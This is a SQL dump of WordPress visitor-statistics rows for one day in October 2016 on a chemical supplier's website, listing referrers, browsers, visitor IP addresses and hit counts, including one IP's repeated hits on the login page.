INSERT INTO `wp_statistics_visitor` VALUES (12573, '2016-10-27', 'https://www.miller-stephenson.com', 'Unknown', 'Unknown', 'Unknown', '', '203.190.127.229', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (12574, '2016-10-27', 'https://www.google.de/url?sa=t&rct=j&q=&esrc=s&source=web&cd=6&cad=rja&uact=8&ved=0ahUKEwir7qbLrPrPAhUBu48KHb-hDwgQFghDMAU&url=https%3A%2F%2F104.238.94.202%2F%7Enotactiveddd%2Fms4%2Fproduct%2Fradical-initiators%2F&usg=AFQjCNGsOa1DbL5rD6LUveJke-YvH7UOAA&bvm=bv.136811127,d.c2I', 'MSIE', 'Windows', '11.0', '', '203.190.127.229', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (12575, '2016-10-27', 'https://www.google.hu/', 'Firefox', 'Windows', '49.0', '', '78.131.75.195', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (12576, '2016-10-27', 'https://www.miller-stephenson.com', 'MSIE', 'Windows', '9.0', '', '202.65.158.54', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (12577, '2016-10-27', 'https://google.com/search?q=anonymous', 'Chrome', 'Windows', '21.0.1180.89', '', '82.211.1.113', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (12578, '2016-10-27', 'https://www.weburlopener.com/', 'Chrome', 'Windows', '53.0.2785.143', '', '115.119.115.234', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (12579, '2016-10-27', 'https://www.miller-stephenson.com/product/aeroduster-ms-222n/', 'Chrome', 'Windows', '53.0.2785.143', '', '117.247.177.169', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (12580, '2016-10-27', 'https://www.google.co.kr/', 'Firefox', 'Windows', '49.0', '', '183.99.183.152', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (12581, '2016-10-27', 'https://www.google.com/', 'Safari', 'Macintosh', '10.0', '', '71.80.238.35', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (12582, '2016-10-27', 'https://www.google.com/url?sa=t&rct=j&q=&esrc=s&source=web&cd=1&ved=0CDwQFjAB&url=https%3A%2F%2F104.238.94.202%2F%7Enotactiveddd%2Fms4%2Fchemicals%2Fkrytox-tribosys-finish-line%2Fkrytox-lubricants%2F&ei=eKcRWJj3CKDvygaFLg&usg=AFQjCNFJMcZt6xCpXzcHAOYSpI7Q31y8hg', 'Chrome', 'Android', '44.0.2403.133', '', '66.102.6.121', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (12583, '2016-10-27', 'https://www.miller-stephenson.com/chemicals/krytox-tribosys-finish-line/krytox-lubricants/', 'Chrome', 'Android', '44.0.2403.133', '', '66.102.6.119', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (12584, '2016-10-27', 'https://www.google.ch', 'Firefox', 'Windows', '45.0', '', '77.59.198.180', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (12585, '2016-10-27', 'https://www.miller-stephenson.com', 'SonyEricssonJ300c', 'Unknown', 'R2BA', '', '118.201.52.146', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (12586, '2016-10-27', 'https://www.miller-stephenson.com', 'Chrome', 'Windows', '45.0.2454.93', '', '202.46.57.164', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (12587, '2016-10-27', 'https://www.google.hu/', 'Chrome', 'Windows', '54.0.2840.71', '', '213.253.204.114', '000', 16, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (12588, '2016-10-27', 'https://www.miller-stephenson.com', 'VB', 'Unknown', 'Unknown', '', '115.119.113.194', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (12589, '2016-10-27', 'https://www.bing.com/search?q=opteon+sion&src=IE-TopResult&FORM=IETR02&conversationid=', 'MSIE', 'Windows', '11.0', '', '81.105.178.52', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (12590, '2016-10-27', 'https://www.miller-stephenson.com', 'Chrome', 'Windows', '45.0.2454.93', '', '202.46.54.95', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (12591, '2016-10-27', 'https://www.miller-stephenson.com', 'Chrome', 'Windows', '45.0.2454.93', '', '202.46.57.73', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (12592, '2016-10-27', 'https://www.google.ca/', 'Chrome', 'Macintosh', '54.0.2840.71', '', '24.86.74.244', '000', 4, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (12593, '2016-10-27', 'https://www.google.co.kr/url?url=https://www.miller-stephenson.com/chemicals/krytox-tribosys-finish-line/tribosys/ptfe-dryfilm-lubricants/&rct=j&frm=1&q=&esrc=s&sa=U&ved=0ahUKEwjDr8_XwvrPAhWDk5QKHbL_C_4QFggjMAM&usg=AFQjCNHlXlm_IH06in0RTtr6TKSRrrIjgA', 'MSIE', 'Windows', '7.0', '', '175.125.133.197', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (12594, '2016-10-27', 'https://www.miller-stephenson.com', 'Unknown', 'Unknown', 'Unknown', '', '193.109.46.22', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (12595, '2016-10-27', 'https://www.miller-stephenson.com', 'Unknown', 'Unknown', 'Unknown', '', '66.11.128.152', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (12596, '2016-10-27', 'https://www.google.co.th/', 'Chrome', 'Windows', '54.0.2840.71', '', '203.146.20.17', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (12597, '2016-10-27', 'https://www.miller-stephenson.com', 'Unknown', 'Unknown', 'Unknown', '', '112.78.125.45', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (12598, '2016-10-27', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '29.0', '', '35.160.105.143', '000', 9, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (12599, '2016-10-27', 'https://www.google.fr/url?sa=t&rct=j&q=&esrc=s&source=web&cd=1&cad=rja&uact=8&ved=0ahUKEwilybuoyPrPAhXGUhQKHVpBB58QFggpMAA&url=https%3A%2F%2F104.238.94.202%2F%7Enotactiveddd%2Fms4%2Fproduct%2Fxp-2a4-2%2F&usg=AFQjCNG_9sigjN8vIWBqV5Vb7AM8VvEbHg&bvm=bv.136811127,d.d24', 'MSIE', 'Windows', '11.0', '', '146.247.89.225', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (12600, '2016-10-27', 'https://www.miller-stephenson.com', 'Unknown', 'Unknown', 'Unknown', '', '178.254.50.109', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (12601, '2016-10-27', 'https://www.miller-stephenson.com', 'Unknown', 'Unknown', 'Unknown', '', '184.168.200.137', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (12602, '2016-10-27', 'https://www.miller-stephenson.com', 'Unknown', 'Unknown', 'Unknown', '', '184.168.200.74', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (12603, '2016-10-27', 'https://www.miller-stephenson.com', 'MSIE', 'Windows', '9.0', '', '204.79.180.135', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (12604, '2016-10-27', 'https://www.miller-stephenson.com/chemicals/vazo-radical-initiators/', 'MSIE', 'Windows', '9.0', '', '204.79.180.186', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (12605, '2016-10-27', 'https://www.google.com/', 'Chrome', 'Windows', '54.0.2840.71', '', '5.172.129.66', '000', 24, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (12606, '2016-10-27', 'https://www.miller-stephenson.com', 'Unknown', 'Unknown', 'Unknown', '', '98.130.2.53', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (12607, '2016-10-27', 'https://www.miller-stephenson.com', 'MSIE', 'Windows', '6.0', '', '161.69.31.20', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (12608, '2016-10-27', 'https://www.google.com/url?sa=t&rct=j&q=&esrc=s&source=web&cd=1&ved=0CCEQFjAA&url=https%3A%2F%2F104.238.94.202%2F%7Enotactiveddd%2Fms4%2Fmiller%2Fvazo_overview.html&ei=DcIRWNiaDOTL7gTmtwE&usg=AFQjCNESI5yDu11sJVIRdHyRBsQiHWCyHw', 'Chrome', 'Android', '44.0.2403.133', '', '66.249.88.154', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (12609, '2016-10-27', 'https://www.miller-stephenson.com/chemicals/vazo-radical-initiators/', 'Chrome', 'Android', '44.0.2403.133', '', '66.249.88.156', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (12610, '2016-10-27', 'https://www.miller-stephenson.com', 'Chrome', 'Windows', '45.0.2454.93', '', '202.46.55.130', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (12611, '2016-10-27', 'https://www.miller-stephenson.com', 'Chrome', 'Windows', '54.0.2840.71', '', '115.119.115.234', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (12612, '2016-10-27', 'https://www.miller-stephenson.com', 'MSIE', 'Windows', '9.0', '', '204.79.180.49', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (12613, '2016-10-27', 'https://www.miller-stephenson.com/chemicals/conformal-coatings/', 'MSIE', 'Windows', '9.0', '', '204.79.180.211', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (12614, '2016-10-27', 'https://www.google.co.il/', 'Chrome', 'Windows', '54.0.2840.71', '', '79.182.92.75', '000', 6, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (12615, '2016-10-27', 'https://www.google.com/', 'Chrome', 'Macintosh', '54.0.2840.71', '', '64.134.102.162', '000', 4, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (12616, '2016-10-27', 'https://www.miller-stephenson.com', 'Unknown', 'Unknown', 'Unknown', '', '58.20.108.146', '000', 10, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (12617, '2016-10-27', 'https://www.miller-stephenson.com', 'Unknown', 'Unknown', 'Unknown', '', '182.69.242.168', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (12618, '2016-10-27', 'https://www.miller-stephenson.com/', 'Firefox', 'Windows', '35.0', '', '37.72.191.77', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (12619, '2016-10-27', 'https://www.miller-stephenson.com/', 'Opera', 'Windows', '12.17', '', '37.72.191.77', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (12620, '2016-10-27', 'https://www.miller-stephenson.com/military-spec-chemicals/', 'Safari', 'iPhone', '10.0', '', '24.193.212.151', '000', 14, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (12621, '2016-10-27', 'https://www.miller-stephenson.com', 'Chrome', 'Windows', '41.0.2228.0', '', '125.209.235.176', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (12622, '2016-10-27', 'https://www.miller-stephenson.com', 'MSIE', 'Windows', '9.0', '', '204.79.180.206', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (12623, '2016-10-27', 'https://www.miller-stephenson.com', 'MSIE', 'Windows', '9.0', '', '204.79.180.105', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (12624, '2016-10-27', 'https://mschemicals.com/', 'Firefox', 'Windows', '12.0', '', '91.215.152.21', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (12625, '2016-10-27', 'https://www.miller-stephenson.com/', 'Firefox', 'Windows', '22.0', '', '91.215.152.21', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (12626, '2016-10-27', 'https://www.miller-stephenson.com/', 'MSIE', 'Windows', '9.0', '', '204.79.180.152', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (12627, '2016-10-27', 'https://www.miller-stephenson.com', 'Chrome', 'Linux', '49.0.2623.75', '', '174.136.133.132', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (12628, '2016-10-27', 'https://www.miller-stephenson.com', 'Chrome', 'Windows', '54.0.2840.71', '', '107.3.95.149', '000', 13, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (12629, '2016-10-27', 'https://www.miller-stephenson.com', 'Safari', 'Linux', '537.36', '', '192.0.100.186', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (12630, '2016-10-27', 'https://www.miller-stephenson.com', 'MSIE', 'Windows', '9.0', '', '204.79.180.220', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (12631, '2016-10-27', 'https://www.miller-stephenson.com/chemicals/epoxy-resins/epi-rez-epoxy-resins/', 'MSIE', 'Windows', '9.0', '', '204.79.180.71', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (12632, '2016-10-27', 'https://www.miller-stephenson.com', 'Chrome', 'Windows', '45.0.2454.93', '', '202.46.52.118', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (12633, '2016-10-27', 'https://www.miller-stephenson.com', 'Chrome', 'Windows', '45.0.2454.93', '', '202.46.54.134', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (12634, '2016-10-27', 'https://www.miller-stephenson.com', 'MSIE', 'Windows', '5.01', '', '95.77.105.225', '000', 5, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (12635, '2016-10-27', 'https://www.google.co.uk/url?url=https://www.miller-stephenson.com/product/krytox-gpl-100/&rct=j&frm=1&q=&esrc=s&sa=U&ved=0ahUKEwiT9uqd7_rPAhVBlSwKHdY0B4cQFgggMAI&usg=AFQjCNFYbiqKOLUiuuziT-BffbKM1VZxgw', 'MSIE', 'Windows', '9.0', '', '193.62.251.20', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (12636, '2016-10-27', 'https://www.google.com/url?sa=t&rct=j&q=&esrc=s&source=web&cd=3&ved=0ahUKEwik2YSZ8frPAhXDeD4KHas-CMAQFghGMAI&url=https%3A%2F%2F104.238.94.202%2F%7Enotactiveddd%2Fms4%2Fproduct%2Furethane-conformal-coatings%2F&usg=AFQjCNGTCaQRTrQwoKXeOJIZqdyqfOBDjw', 'MSIE', 'Windows', '11.0', '', '206.208.38.2', '000', 15, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (12637, '2016-10-27', 'https://www.spacetechexpo.com/visit/exhibitor-list-2017', 'Chrome', 'Windows', '54.0.2840.71', '', '125.99.236.55', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (12638, '2016-10-27', 'https://www.google.fr/', 'Chrome', 'Windows', '54.0.2840.71', '', '77.203.35.217', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (12639, '2016-10-27', 'https://www.miller-stephenson.com', 'Chrome', 'Linux', '49.0.2623.75', '', '217.131.55.142', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (12640, '2016-10-27', 'https://www.google.co.in/', 'Chrome', 'Windows', '54.0.2840.71', '', '122.171.191.104', '000', 10, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (12641, '2016-10-27', 'https://www.google.co.uk/url?sa=t&rct=j&q=&esrc=s&source=web&cd=1&ved=0ahUKEwj_hOic9PrPAhVFAcAKHfwTBqYQFggcMAA&url=https%3A%2F%2F104.238.94.202%2F%7Enotactiveddd%2Fms4%2Fproduct%2Fepoxy-stripping-agent%2F&usg=AFQjCNHyHrENwK6aF83_lUeQUwZOtOmNNQ&bvm=bv.136811127,d.d24', 'MSIE', 'Windows', '11.0', '', '178.78.110.66', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (12642, '2016-10-27', 'https://www.miller-stephenson.com', 'Microsoft-WebDAV-MiniRedir', 'Unknown', '6.1.7601', '', '178.78.110.66', '000', 5, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (12643, '2016-10-27', 'https://pokerniydom.ru/', 'Opera', 'Windows', '7.11', '', '46.119.119.89', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (12644, '2016-10-27', 'https://www.google.fr/url?sa=t&rct=j&q=&esrc=s&frm=1&source=web&cd=10&ved=0ahUKEwj3q8mf9frPAhWBExoKHRBDAlMQFghiMAk&url=https%3A%2F%2F104.238.94.202%2F%7Enotactiveddd%2Fms4%2Fproduct%2Fkrytox-240ac%2F&usg=AFQjCNGMGT-9sDD56bUfjS2_Mysw8RHfIA&bvm=bv.136811127,d.d2s', 'MSIE', 'Windows', '10.0', '', '141.101.58.56', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (12645, '2016-10-27', 'www.miller-stephenson.com', 'Firefox', 'Windows', '3.6.28', '', '81.174.128.122', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (12646, '2016-10-27', 'https://google.com/', 'Firefox', 'Windows', '24.0', '', '62.102.148.187', '000', 6, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (12647, '2016-10-27', 'https://www.google.com.br/', 'Chrome', 'Windows', '55.0.2883.28', '', '192.168.50.122', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (12648, '2016-10-27', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '40.1', '', '94.61.100.9', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (12649, '2016-10-27', 'https://www.google.ro/url?url=https://www.miller-stephenson.com/product/krytox-gpl-205/&rct=j&frm=1&q=&esrc=s&sa=U&ved=0ahUKEwiXvsqu-PrPAhWqK8AKHb_TD6gQFgg-MAY&usg=AFQjCNF3KQ4g086UTdwN_GfmL00-SKLvOg', 'MSIE', 'Windows', '9.0', '', '194.105.4.82', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (12650, '2016-10-27', 'https://www.miller-stephenson.com', 'Chrome', 'Windows', '54.0.2840.71', '', '24.63.154.108', '000', 56, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (12651, '2016-10-27', 'https://www.google.it/url?sa=t&rct=j&q=&esrc=s&source=web&cd=1&cad=rja&uact=8&ved=0ahUKEwiK8daq-vrPAhWmL8AKHXk3B6gQFggfMAA&url=https%3A%2F%2F104.238.94.202%2F%7Enotactiveddd%2Fms4%2Fchemicals%2Fkrytox-tribosys-finish-line%2Ftribosys%2Fptfe-dryfilm-lubricants%2F&usg=AFQjCNGbkrsEd1oupMqq-nMxkLQTYxMOmw&bvm=bv.136811127,d.bGs', 'MSIE', 'Windows', '11.0', '', '85.33.124.2', '000', 18, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (12652, '2016-10-27', 'https://www.google.be/url?sa=t&rct=j&q=&esrc=s&source=web&cd=4&ved=0ahUKEwiS6-Hl-vrPAhUCC8AKHeYkDqUQFgg0MAM&url=https%3A%2F%2F104.238.94.202%2F%7Enotactiveddd%2Fms4%2Fproduct%2Fkrytox-gpl-205%2F&usg=AFQjCNHwZ2VkQ2EkLZn-9yjL6I2BINcdgA&sig2=cEokRxapCHO7atJJ4TDm_Q&bvm=bv.136811127,d.d24', 'MSIE', 'Windows', '11.0', '', '212.123.202.71', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (12653, '2016-10-27', 'https://www.miller-stephenson.com', 'MSIE', 'Windows', '11.0', '', '192.42.246.253', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (12654, '2016-10-27', 'https://www.google.com/', 'Chrome', 'Windows', '54.0.2840.71', '', '100.4.118.18', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (12655, '2016-10-27', 'https://www.miller-stephenson.com/specialty-products-solvents/', 'Safari', 'iPhone', '10.0', '', '166.137.118.46', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (12656, '2016-10-27', 'https://www.miller-stephenson.com', 'MSIE', 'Windows', '8.0', '', '64.235.153.7', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (12657, '2016-10-27', 'https://www.google.com/', 'Chrome', 'Android', '54.0.2840.68', '', '71.60.60.193', '000', 5, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (12658, '2016-10-27', 'https://www.google.com/url?sa=t&rct=j&q=&esrc=s&source=web&cd=1&ved=0ahUKEwjkjtab__rPAhUGbD4KHQ0gDPgQFggdMAA&url=https%3A%2F%2F104.238.94.202%2F%7Enotactiveddd%2Fms4%2F&usg=AFQjCNEfgJjfAhkA4ZtEWf54OtcSuvhxUw&bvm=bv.136811127,d.cWw', 'MSIE', 'Windows', '11.0', '', '12.148.7.34', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (12659, '2016-10-27', 'https://www.google.fr/', 'Chrome', 'Windows', '54.0.2840.71', '', '5.10.131.66', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (12660, '2016-10-27', 'https://www.miller-stephenson.com', 'MSIE', 'Windows', '8.0', '', '64.235.154.104', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (12661, '2016-10-27', 'https://www.google.com/', 'Chrome', 'Windows', '53.0.2785.116', '', '205.254.147.8', '000', 10, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (12662, '2016-10-27', 'https://www.miller-stephenson.com', 'Unknown', 'Unknown', 'Unknown', '', '205.254.147.8', '000', 30, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (12663, '2016-10-27', 'https://www.bing.com/search?q=buy%20MS-470N&qs=n&form=QBRE&pq=buy%20ms-470n&sc=2-11&sp=-1&sk=&cvid=4756ACCA63E848CCBF915174105B7BAD', 'MSIE', 'Windows', '11.0', '', '12.216.216.3', '000', 15, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (12664, '2016-10-27', 'https://www.google.com/', 'Chrome', 'Windows', '54.0.2840.71', '', '147.108.253.73', '000', 7, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (12665, '2016-10-27', 'https://www.google.com/', 'Chrome', 'Windows', '53.0.2785.143', '', '74.219.14.2', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (12666, '2016-10-27', 'https://www.google.com.au/', 'Safari', 'iPhone', '600.1.4', '', '210.10.135.134', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (12667, '2016-10-27', 'https://www.miller-stephenson.com', 'MSIE', 'Windows', '8.0', '', '64.235.154.106', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (12668, '2016-10-27', 'https://www.miller-stephenson.com', 'MSIE', 'Windows', '8.0', '', '70.42.131.106', '000', 13, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (12669, '2016-10-27', 'https://www.google.de/', 'Firefox', 'Windows', '49.0', '', '195.14.202.151', '000', 10, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (12670, '2016-10-27', 'https://www.miller-stephenson.com', 'MSIE', 'Windows', '9.0', '', '70.39.157.194', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (12671, '2016-10-27', 'https://www.google.com/', 'Chrome', 'Windows', '53.0.2785.143', '', '24.63.154.108', '000', 4, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (12672, '2016-10-27', 'https://www.miller-stephenson.com/wp-login.php', 'MSIE', 'Windows', '9.0', '', '91.200.12.132', '000', 784, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (12673, '2016-10-27', 'https://www.google.com/', 'Chrome', 'Windows', '54.0.2840.71', '', '96.88.154.233', '000', 7, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (12674, '2016-10-27', 'https://www.miller-stephenson.com', 'Safari', 'iPad', '10.0', '', '199.167.119.1', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (12675, '2016-10-27', 'https://www.miller-stephenson.com', 'Chrome', 'Linux', '49.0.2623.75', '', '32.217.34.236', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (12676, '2016-10-27', 'https://www.google.com/', 'Chrome', 'Windows', '53.0.2785.116', '', '147.108.253.73', '000', 11, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (12677, '2016-10-27', 'https://www.miller-stephenson.com', 'MSIE', 'Windows', '6.0', '', '91.200.12.132', '000', 4, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (12678, '2016-10-27', 'https://www.miller-stephenson.com', 'Chrome', 'Linux', '49.0.2623.75', '', '68.193.188.205', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (12679, '2016-10-27', 'https://www.google.com/url?sa=t&rct=j&q=&esrc=s&source=web&cd=4&ved=0ahUKEwiQ1J3jiPvPAhUq2IMKHUYFAqAQFggtMAM&url=https%3A%2F%2F104.238.94.202%2F%7Enotactiveddd%2Fms4%2Fproduct%2Fheloxy-68%2F&usg=AFQjCNHIpSG8awpkXvKTIVKScMyva-yAFg&sig2=ndnWjQJZS2FEND_X8xpN3w&bvm=bv.136811127,d.amc', 'MSIE', 'Windows', '11.0', '', '165.129.13.15', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (12680, '2016-10-27', 'https://www.miller-stephenson.com', 'Chrome', 'Windows', '45.0.2454.93', '', '202.46.49.65', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (12681, '2016-10-27', 'https://confib.ifmo.ru/', 'MSIE', 'Windows', '5.5', '', '46.119.118.233', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (12682, '2016-10-27', 'https://www.google.com/', 'Chrome', 'Windows', '54.0.2840.71', '', '24.184.68.205', '000', 7, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (12683, '2016-10-27', 'https://www.google.fr/', 'Chrome', 'Windows', '53.0.2785.143', '', '62.102.228.48', '000', 18, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (12684, '2016-10-27', 'https://www.miller-stephenson.com', 'Chrome', 'Windows', '53.0.2785.143', '', '174.49.219.132', '000', 10, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (12685, '2016-10-27', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '49.0', '', '64.135.206.52', '000', 5, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (12686, '2016-10-27', 'https://r.search.yahoo.com/_ylt=A86.JyBrARJYdS0ANnAnnIlQ;_ylu=X3oDMTEyamVwYXJvBGNvbG8DZ3ExBHBvcwMxBHZ0aWQDQjI2OTFfMQRzZWMDc3I-/RV=2/RE=1477603820/RO=10/RU=https%3a%2f%2fwww.miller-stephenson.com%2f/RK=0/RS=.8Exd.dThLcG4lxmsKwRXX03gro-', 'Firefox', 'Windows', '44.0', '', '10.49.33.166', '000', 16, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (12687, '2016-10-27', 'https://www.google.com/aclk?sa=L&ai=DChcSEwi9yrqcjPvPAhWLon4KHSGmBdQYABAA&ei=xQESWKi5NcLujwSpzo6ACg&sig=AOD64_1hxS3Mhx2bAfIxojcrejDzsVVeXw&rct=j&q=&sqi=2&ved=0ahUKEwjor7acjPvPAhVC94MKHSmnA6AQ0QwIGg&adurl=', 'MSIE', 'Windows', '11.0', '', '199.48.77.26', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (12688, '2016-10-27', 'https://www.miller-stephenson.com', 'MSIE', 'Windows', '11.0', '', '24.63.154.108', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (12689, '2016-10-27', 'https://www.bing.com/search?q=aero+duster+miller+stephenson+msds&src=IE-SearchBox&FORM=IE11SR&adlt=strict', 'MSIE', 'Windows', '11.0', '', '98.159.4.18', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (12690, '2016-10-27', 'https://www.google.co.uk/url?sa=t&rct=j&q=&esrc=s&source=web&cd=5&ved=0ahUKEwj6_v_6jfvPAhULM8AKHYdjCa0QFghOMAQ&url=https%3A%2F%2F104.238.94.202%2F%7Enotactiveddd%2Fms4%2Fproduct%2Fkrytox-gpl-205%2F&usg=AFQjCNHwZ2VkQ2EkLZn-9yjL6I2BINcdgA&bvm=bv.136811127,d.d24', 'MSIE', 'Windows', '11.0', '', '217.33.205.100', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (12691, '2016-10-27', 'https://www.miller-stephenson.com', 'Chrome', 'Windows', '54.0.2840.71', '', '200.76.153.50', '000', 17, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (12692, '2016-10-27', 'https://www.miller-stephenson.com', 'Chrome', 'Linux', '49.0.2623.75', '', '24.63.154.108', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (12693, '2016-10-27', 'https://www.miller-stephenson.com', 'Firefox', 'Linux', '31.0', '', '121.200.54.98', '000', 4, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (12694, '2016-10-27', 'https://www.google.com/url?sa=t&rct=j&q=&esrc=s&source=web&cd=1&sqi=2&ved=0ahUKEwixlJqIkPvPAhWJWj4KHSKaDZkQFggcMAA&url=https%3A%2F%2F104.238.94.202%2F%7Enotactiveddd%2Fms4%2Fproduct%2Fms-907-two-part-epoxy-adhesive%2F&usg=AFQjCNG-RsF8ufC-UmC2iZIs3mMktO4dqg&bvm=bv.136811127,d.cWw', 'MSIE', 'Windows', '11.0', '', '72.64.128.49', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (12695, '2016-10-27', 'https://www.miller-stephenson.com', 'Microsoft-WebDAV-MiniRedir', 'Unknown', '10.0.14393', '', '72.64.128.49', '000', 2, 0); 
